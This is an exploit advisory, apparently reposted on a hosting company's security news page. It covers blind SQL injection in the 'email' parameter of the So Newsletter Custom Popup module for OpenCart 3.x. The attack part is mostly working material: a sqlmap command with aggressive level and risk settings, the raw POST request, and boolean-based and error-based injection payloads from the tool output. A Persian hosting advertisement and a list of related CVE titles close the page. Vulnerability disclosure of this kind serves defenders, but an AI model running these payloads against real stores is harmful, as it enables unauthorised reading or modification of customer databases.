OpenCart 3.x Newsletter Custom Popup 4.0 SQL Injection

# Exploit Title: OpenCart v3.x So Newsletter Custom Popup Module – Blind SQL Injection
# Date: 18/09/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=40259&filter_search=newsletter&filter_license=1&sort=date_added
# Version: v.4.0
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz

* Description :

So Newsletter Custom Popup Module is compatible with any Opencart allows SQL Injection via parameter ’email’ in index.php?route=extension/module/so_newletter_custom_popup/newsletter.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

* Steps to Reproduce :
– Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter
– Save request in BurpSuite
– Run saved request with : sqlmap -r sql.txt -p email –random-agent –level=5 –risk=3 –time-sec=5 –hex –dbs

Request :

===========

POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 29
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: Keep-alive

createdate=2022-8-28%2019:4:6&email=hi&status=0

===========

Output :

Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: createdate=2022-8-28 19:4:6&email=hi’ AND 4805=4805– nSeP&status=0

Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: createdate=2022-8-28 19:4:6&email=hi’ AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(4828=4828,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– sRQS&status=0

آسیب‌پذیری‌های جدید و وصله‌های امنیتی به‌صورت مداوم منتشر می‌شوند و عدم بروزرسانی به‌موقع می‌تواند امنیت سرویس‌های حیاتی را به خطر بیندازد. خدمات مدیریت و پشتیبانی سرور آفاق هاستینگ شامل پایش امنیتی، بروزرسانی نرم‌افزارها، نصب Patchهای امنیتی و سخت‌سازی سرورها است.

خدمات مدیریت و امنیت سرور

نوشته های مشابه

CVE-2026-12183 – Nefteprodukttekhnika BUK TS-G Improper Authentication

CVE-2026-6428 – Koha SQL Injection

CVE-2026-5513 – Online Scheduling and Appointment Booking System – Bookly

CVE-2026-11624 – Model Context Protocol DNS Rebinding Vulnerability